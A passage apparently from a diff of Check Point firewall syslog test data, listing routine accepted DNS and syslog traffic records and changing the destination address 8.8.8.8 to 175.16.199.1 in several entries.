FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500714"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40923"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60127"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500715"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47915"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d22d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33716"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:51:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d22f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500719"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37557"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43215"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54308"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d230,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500720"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34739"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57495"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49150"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d238,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45367"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d239,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500729"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57495"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d236,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49150"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d238,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45367"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d239,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500729"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500731"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57721"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500731"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d23d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"] <134>1 2020-03-29T16:52:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56629"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44079"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40876"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
